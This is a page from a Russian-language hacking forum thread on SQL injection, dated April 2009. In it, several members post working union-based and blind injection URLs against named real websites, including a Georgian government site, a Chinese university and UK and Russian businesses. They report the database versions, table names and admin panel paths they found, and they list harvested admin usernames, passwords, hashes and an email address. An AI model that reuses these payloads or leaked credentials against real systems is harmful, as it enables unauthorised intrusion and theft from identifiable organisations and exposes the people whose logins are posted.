HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 881 из 1602 « Первая < 381781831871 877 878 879 880 881 882 883 884 885 8919319811381 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.04.2009, 13:41
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию
<<Большая Экономическая библиотека>>
Код:
http://www.economics.com.ua/lib/detail.php?cat=1&rub=3&id=-420+union+select+concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,0,1,2,3,4--+
5.0.27*:*economics*:*usmdi@localhost*:*redhat-linux-gnu
table: xmb_members
db: corporation
log: Admin
pass: 86b7c7f6dd33661e19a89cf6b1253197 ):
+limit+x,x--+

tables where: like+'password'--+
Код:
http://www.economics.com.ua/lib/detail.php?cat=1&rub=3&id=-420+union+select+table_name,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.columns+where+column_name+like+'password'+limit+0,1--+
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось farex; 21.04.2009 в 13:45..
 
Ответить с цитированием

  #2  
Старый 21.04.2009, 14:54
hitt 1g
Новичок
Регистрация: 14.04.2009
Сообщений: 6
С нами: 8986808

Репутация: 44
По умолчанию
Цитата:
http://www.wanderlust.co.uk/event.php?event_id=341+and+1=0+union+select+1,conc at_ws(0x3a,admin_username,admin_password,admin_ema il),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22+from+admin_users--
DB Version: 5.0.27-log
DB Name: wanderlustlive
DB User: wanderlustlive@localhost

Admin data: ellion:zak2bRaP:danny.callaghan@wanderlust.co.uk

PR: 6

Цитата:
http://www.fnv.is/index.php?pid=69&cid=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),user(),database()),.8,9,10,11,12,13,14--
DB Version: 4.0.20a-nt
DB Name: fnv
DB User: smali@localhost

PR: 6

Цитата:
http://www.michaelstewart.co.uk/index.php?page_id=brand&brandid=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6,7,8,9,10,11,12+from+STAFF+limit+1,1--
DB Version: 5.0.67-community
DB Name: michael_michaelstewart
DB User: michael_kanx197@localhost

Admin data: Admin: DBAdmin / Marco:Monteiro

PR: 6

Цитата:
http://www.runningroom.com/hm/inside.php?id=1+and+1=0+union+select+concat_ws(0x3 a,database(),user(),version()),2--
DB Version: 4.1.22-standard-log
DB Name: rr_main
DB User: rrweb_user@runningroomcanada.com

PR: 6
 
Ответить с цитированием

  #3  
Старый 21.04.2009, 15:32
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию
http://web-well.ru/ptype?view=-3+union+select+1,2--

Version: 5.0.22
Тиц 20
 
Ответить с цитированием

  #4  
Старый 21.04.2009, 15:50
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию
http://www.rs.kljb.de/display.php?idcnt=58&idver=-155+union+select+1,2,3/*

Database Version: 4.1.24
Database name: usrdb_kljduqls
User name: kljduqls@localhost
 
Ответить с цитированием

  #5  
Старый 21.04.2009, 19:05
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию
<<"Дарья Данцова"Официальный сайт>>
Код:
http://www.dontsova.ru/view_press.php?id=-38'+union+select+1,2,3,4,5,concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),7,8,9,0,1,2,3--+
4.0.21-standard-log*:*www_dontsova_ru*:*dontsova_ru_db@192.168.0.1 *:*unknown-linux
Код:
http://www.dontsova.ru/site_admin
-------------------------------------------
-=\|sql-blind|/=-
<<студия Интернет рекламы>>
Код:
http://12kb.ru/one_article.php?id=99999+and+ascii(substring(version(),1,1))=53--+
Код:
http://12kb.ru/admin/
Последний раз редактировалось farex; 21.04.2009 в 20:06..
 
Ответить с цитированием

  #6  
Старый 21.04.2009, 23:57
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
С нами: 9093390

Репутация: 94
По умолчанию
Скуля на http://www.eu-integration.gov.ge

Список таблиц.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(table_name+as+ binary)+from+information_schema.tables+--+

Поля таблицы user.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(column_name+as +binary)+from+information_schema.columns+where+tab le_name=0x75736572+--+

Список пользователей-паролей.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,concat_ws(0x3a,cast (username+as+binary),cast(password+as+binary))+fro m+user+--+

Версия БД: 5.0.77
Ось: portbld-freebsd6.3
Имя БД: euinteg_euinteg
Рабочая папка БД: /var/db/mysql/
Пользователь БД: euinteg_euint@localhost

Прав на чтения файлов нет, доступа к mysql.user нет.
 
Ответить с цитированием

  #7  
Старый 22.04.2009, 00:13
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
По умолчанию
Театральные новые известия(pr6)
Код:
http://teatr.newizv.ru/news/?IDNews=-1+union+select+1,database(),table_name,4,5,6,7,8,9,11,12--&date=2008-07-01
user() - u10605@10.10.12.75
database() - u10605
version() - 5.0.45-log
База данных одна с главным доменом newizv.ru (тиц-12к pr-7)
Интересные таблы
Код:
ReklamaUsers
rgn_users
users
users_
prupal_access
еще есть форум и должна быть неплохая база подписчиков
 
Ответить с цитированием

  #8  
Старый 22.04.2009, 09:35
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
С нами: 9092536

Репутация: 34
По умолчанию
math.ecnu.edu.cn pr 6
Код:
http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4--

5.0.45:faculty:root@localhost

http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,file_priv,concat(user,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20from%20mysql.user--

root:07ffadcc61d6408b file_priv - Y
 
Ответить с цитированием

  #9  
Старый 22.04.2009, 11:32
lalala23
Новичок
Регистрация: 14.03.2009
Сообщений: 4
С нами: 9031875

Репутация: 6
По умолчанию
Цитата:
http://www.konsalting.tv/content.php?r=-29+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3%20--
4.0.26-log:Uwww3947S@localhost:udb3947

Цитата:
http://www.antgroup.kz/eng/index.php?p=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,6,7%20--
4.1.25:antbase_eng:antbase@localhost
Последний раз редактировалось lalala23; 22.04.2009 в 13:30..
 
Ответить с цитированием

  #10  
Старый 22.04.2009, 14:54
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
С нами: 9093390

Репутация: 94
По умолчанию
Скуля на www.relaytoday.com

Уязвимый скрипт(9 полей)
http://www.relaytoday.com/admin/previewnewsletter.php?ID=2

Список всех таблиц базы данных.
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables+--+

Список полей таблицы users
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=0x757365 7273+--+

Логин/пароль
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,concat_ws(0x3a,username,passwor d,admin),4,5,6,7,8,9+from+users+--+

Сводка по системе
Версия БД: 5.0.67-log
пользователь: wkhorse_1@localhost
Имя базы данных: wkhorse_relaytoday
ОС: apple-darwin9.0
Папка мускула: /var/mysql/

Админка
http://www.relaytoday.com/admin/

Доступа к mysql.user нет. Прав на чтение файла нет.
 
Ответить с цитированием
Ответ
Страница 881 из 1602 « Первая < 381781831871 877 878 879 880 881 882 883 884 885 8919319811381 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.